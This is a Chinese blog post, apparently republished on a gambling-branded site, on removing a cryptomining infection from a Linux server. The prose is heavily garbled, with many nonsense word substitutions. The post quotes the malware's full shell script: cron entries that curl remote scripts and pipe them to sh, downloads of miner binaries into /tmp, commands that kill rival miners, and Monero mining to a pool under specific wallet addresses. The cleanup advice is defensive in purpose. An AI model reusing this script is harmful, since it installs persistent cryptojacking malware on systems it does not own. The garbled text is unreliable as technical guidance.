来自 金沙澳门官网网址 2019-11-28 17:35 的文章
当前位置: 金沙澳门官网网址 > 金沙澳门官网网址 > 正文

服务器LIUNX之如何解决矿机问题

点步入的主旨都以境遇liunx变矿机的同伙吧(cpu运载300%卡塔尔(قطر‎卡的连终端都很难打开
开下来之后提醒 大体是, 到xxx网址给钱了事, 不过基本这一个网址为主也上不去, 要么是暴力破解, 要么是透过 redis 6379端口 详细的情况驾驭redis安全漏洞

欣逢这种难题势必:

  • 先要把猛然冒出的颠来倒去的占cpu过高的进程kill -stop pid 暂停掉, 不要尝试直接kill -9 pid
  • cd /etc/cron 查看依期职务 假若在/var/spool/cron那些中也看下
  • 专断的定时职责 内容大致是那般的
    */5 * * * * curl -fsSL http://www.hacker.com/ltc/minerd/pm.sh | sh
    情趣很引人瞩目了, 前边的*/5 * * * * 我们很谙习吧
    curl 是liunx上模拟 浏览器诉求的命令 -fsSl 大约意思正是啥都不出示, 你看见下载消息 | sh 下载后运维
    来看下脚本内容
  • export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

    echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0223 | sh" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0223 | sh" > /var/spool/cron/crontabs/root
    
    if [ ! -f "/tmp/ddg.223" ]; then
        curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.223
    fi
    chmod +x /tmp/ddg.223 && /tmp/ddg.223
    
    CleanTail()
    {
        ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
    }
    
    DoYam()
    {
        if [ ! -f "/tmp/AnXqV.yam" ]; then
            curl -fsSL http://www.haveabitchin.com/yam -o /tmp/AnXqV.yam
        fi
        chmod +x /tmp/AnXqV.yam
        /tmp/AnXqV.yam -c x -M stratum+tcp://44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM:x@xmr.crypto-pool.fr:443/xmr
    }
    
    DoMiner()
    {
        if [ ! -f "/tmp/AnXqV" ]; then
            curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
        fi
        chmod +x /tmp/AnXqV
        /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
    }
    
    DoMinerNoAes()
    {
        if [ ! -f "/tmp/AnXqV.noaes" ]; then
            curl -fsSL http://www.haveabitchin.com/minerd.noaes -o /tmp/AnXqV.noaes
        fi
        chmod +x /tmp/AnXqV.noaes
        /tmp/AnXqV.noaes -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
    }
    
    ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "AnXqV" || DoMiner
    ps auxf|grep -v grep|grep "AnXqV" || DoYam
    ps auxf|grep -v grep|grep "AnXqV" || DoMinerNoAes
    

     

  • 最后 到 /tmp/中去除全体的文件 完全没什么 记得用ll -a 看下隐敝的公文, 也要删掉

多多精通对的的

 

本文由金沙澳门官网网址发布于金沙澳门官网网址,转载请注明出处:服务器LIUNX之如何解决矿机问题

关键词: